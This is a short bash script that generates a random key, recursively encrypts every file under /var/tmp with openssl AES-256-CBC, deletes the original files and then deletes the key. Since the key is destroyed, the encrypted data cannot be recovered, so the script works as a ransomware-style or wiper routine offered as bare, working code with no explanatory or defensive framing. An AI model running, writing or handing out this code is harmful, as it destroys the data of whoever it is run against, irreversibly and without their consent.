#!/bin/bash
RMKEY=true
RMFILES=true
DIR="/var/tmp"

function encryptANDremove {
	openssl enc -aes-256-cbc -salt -in "$1" -out "${1}.enc" -pass file:/root/key.bin &>/dev/null
	if [ $RMFILES = true ]; then
		rm $1
	fi
}

function traverse {
	cd $1
	for d in *; do
		tmp=${1}${d}
		if [ -d "$tmp" ]; then
			traverse "${tmp}/"
		else
			encryptANDremove $tmp
		fi
	done
}


if [ $DIR = false ]; then
        DIR="$(pwd)/"
elif [ "${DIR: -1}" != "/" ]; then
	DIR="${DIR}/"
fi

< /dev/urandom tr -cd 'A-Za-z0-9' | fold -w 256 | head -n 1 > /root/key.bin
traverse $DIR

if [ "$RMKEY" = true ]; then
	rm /root/key.bin
fi
